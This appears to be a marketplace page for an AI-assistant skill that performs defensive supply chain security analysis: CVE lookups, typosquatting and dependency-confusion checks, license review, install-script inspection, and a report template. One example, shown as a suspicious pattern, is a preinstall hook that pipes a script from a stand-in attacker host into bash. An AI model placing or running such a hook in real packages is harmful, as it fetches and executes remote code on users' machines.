ワンクリックで
perseus-supply-chain
Supply chain security analysis (CVEs, dependencies, typosquatting, licenses)
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
メニュー
Supply chain security analysis (CVEs, dependencies, typosquatting, licenses)
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
Use when you want to run a full, automated penetration test from start to finish (Scan -> Audit -> Exploit -> Report)
Use when starting a security conversation to understand the Perseus methodology
Use when analyzing components for vulnerabilities (Phase 2 - Parallel Analysis)
Use when verifying vulnerabilities with Dynamic Exploit Generation (Phase 3)
Use when generating the final executive security report (Phase 4)
Run all specialist deep-dive skills in parallel for comprehensive analysis
| name | perseus-supply-chain |
| description | Supply chain security analysis (CVEs, dependencies, typosquatting, licenses) |
IMPORTANT: This skill performs supply chain security analysis on the user's own codebase. This is defensive security testing to find vulnerable dependencies before they're exploited.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
| Language | Package Managers | Manifest Files |
|---|---|---|
| JavaScript/TypeScript | npm, yarn, pnpm, bun | package.json, package-lock.json, yarn.lock, pnpm-lock.yaml |
| Go | go modules | go.mod, go.sum |
| PHP | Composer | composer.json, composer.lock |
| Python | pip, poetry, pipenv | requirements.txt, Pipfile, pyproject.toml, poetry.lock |
| Rust | Cargo | Cargo.toml, Cargo.lock |
| Java | Maven, Gradle | pom.xml, build.gradle, gradle.lockfile |
| Ruby | Bundler | Gemfile, Gemfile.lock |
| C# | NuGet | *.csproj, packages.config, packages.lock.json |
This specialist skill performs comprehensive supply chain analysis including known vulnerabilities (CVEs), dependency confusion, typosquatting, and license compliance.
When to Use: After /scan identifies package manifests, or as regular security hygiene check.
Goal: Identify vulnerable, malicious, or risky dependencies before they compromise the application.
| Mode | Specialist Behavior |
|---|---|
PRODUCTION_SAFE | Manifest and advisory analysis only (passive) |
STAGING_ACTIVE | Controlled resolver/registry validation in staging |
LAB_FULL | Deep dependency behavior validation in isolated lab |
LAB_RED_TEAM | Confusion/typosquat simulation against private test registries only |
deliverables/engagement_profile.md before active package resolution checks.PRODUCTION_SAFE when mode is missing.| Risk | Description | Impact |
|---|---|---|
| Known CVEs | Published vulnerabilities | Exploitation |
| Typosquatting | Malicious similar-named packages | Malware |
| Dependency Confusion | Private/public package name collision | Code execution |
| Outdated Dependencies | Old versions with known issues | Security debt |
| License Issues | GPL in proprietary, license conflicts | Legal risk |
| Malicious Packages | Intentionally harmful packages | Backdoor |
| Abandoned Packages | Unmaintained dependencies | Future risk |
deliverables/engagement_profile.md.deliverables/verification_scope.md if present.Manifest Scanner:
Files to Find:
# JavaScript/TypeScript
package.json
package-lock.json
yarn.lock
pnpm-lock.yaml
bun.lockb
# Go
go.mod
go.sum
# PHP
composer.json
composer.lock
# Python
requirements.txt
requirements-*.txt
Pipfile
Pipfile.lock
pyproject.toml
poetry.lock
# Rust
Cargo.toml
Cargo.lock
# Java
pom.xml
build.gradle
build.gradle.kts
gradle.lockfile
# Ruby
Gemfile
Gemfile.lock
# C#
*.csproj
packages.config
Directory.Packages.props
JavaScript CVE Analyst:
Check Using:
Output Format:
| Package | Version | CVE | Severity | Fixed In |
|---------|---------|-----|----------|----------|
| lodash | 4.17.15 | CVE-2021-23337 | High | 4.17.21 |
Go CVE Analyst:
Check:
Python CVE Analyst:
Check:
Multi-Language CVE Analyst:
Check:
JavaScript Typosquatting Analyst:
Common Patterns:
| Real Package | Typosquat Examples |
|---|---|
| lodash | lodsh, lodahs, 1odash, lodash-utils |
| express | expres, expresss, expess |
| react | raect, reakt, reactjs (unofficial) |
| axios | axois, axio, axiosjs |
Detection Rules:
Multi-Language Typosquatting Analyst:
Python Examples:
| Real Package | Typosquat Examples |
|---|---|
| requests | request, reqeusts |
| django | djang0, djangoo |
| flask | flaask, flaskk |
Private Package Analyst:
Risk Pattern:
// package.json - RISKY
{
"dependencies": {
"@company/internal-lib": "^1.0.0" // If not in private registry...
}
}
Attack:
@company/internal-lib to public npmCheck:
Registry Configuration Analyst:
Files to Check:
.npmrc
.yarnrc
.yarnrc.yml
.pip/pip.conf
~/.config/pip/pip.conf
Major Version Gap Analyst:
Risk Levels:
| Gap | Risk | Example |
|---|---|---|
| 1 major | Low | Using React 17 when 18 is out |
| 2+ major | Medium | Using React 16 when 18 is out |
| EOL | High | Using Node.js 14 (EOL) |
Abandoned Package Analyst:
Indicators:
License Compatibility Analyst:
Risk Matrix:
| Project License | Dependency License | Status |
|---|---|---|
| MIT | MIT | OK |
| MIT | Apache-2.0 | OK |
| MIT | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | AGPL-3.0 | CRITICAL |
License Discovery Analyst:
Issues:
Install Script Analyst:
Patterns to Flag:
// package.json - SUSPICIOUS
{
"scripts": {
"preinstall": "curl evil.com/shell.sh | bash",
"postinstall": "node ./scripts/setup.js" // Check contents!
}
}
Red Flags:
Dependency Chain Analyst:
Issues:
Lockfile Security Analyst:
Issues:
Create deliverables/supply_chain_analysis.md:
# Supply Chain Security Analysis
## Summary
| Category | Packages Checked | Issues | Critical |
|----------|------------------|--------|----------|
| CVEs | X | Y | Z |
| Typosquatting | X | Y | Z |
| Dependency Confusion | X | Y | Z |
| Outdated | X | Y | Z |
| License | X | Y | Z |
| Malicious | X | Y | Z |
## Languages/Package Managers Detected
- JavaScript: npm (package.json)
- Python: pip (requirements.txt)
- Go: go modules (go.mod)
## Critical Vulnerabilities (CVEs)
### [CVE-2021-44228] Log4Shell in log4j
**Severity:** Critical (CVSS 10.0)
**Package:** org.apache.logging.log4j:log4j-core
**Installed Version:** 2.14.1
**Fixed Version:** 2.17.1
**Location:** pom.xml
**Description:** Remote code execution via JNDI lookup in log messages.
**Remediation:**
```xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.17.1</version>
</dependency>
Severity: High (CVSS 8.0) Package: follow-redirects Installed Version: 1.14.5 Fixed Version: 1.14.7 Location: package-lock.json (transitive via axios)
| Severity | Count | Packages |
|---|---|---|
| Critical | 2 | log4j, lodash |
| High | 5 | axios, node-forge, ... |
| Medium | 12 | ... |
| Low | 8 | ... |
| Installed | Suspicious | Confidence |
|---|---|---|
| lodsh | Likely typosquat of lodash | High |
| requests (in npm) | Python package in npm? | Medium |
| Package | Risk | Recommendation |
|---|---|---|
| @company/core | No registry lock | Add to .npmrc |
| Package | Current | Latest | Gap | Risk |
|---|---|---|---|---|
| react | 16.14.0 | 18.2.0 | 2 major | Medium |
| node | 14.x | 20.x | EOL | High |
| Package | License | Issue |
|---|---|---|
| some-lib | GPL-3.0 | Copyleft in MIT project |
| unknown-pkg | UNLICENSED | No license |
# JavaScript
npm audit fix
npm outdated
# Go
go get -u ./...
govulncheck ./...
# Python
pip-audit
pip list --outdated
# Rust
cargo audit
cargo update
**Next Step:** CVE findings can be verified by checking exploit availability and running automated scanners.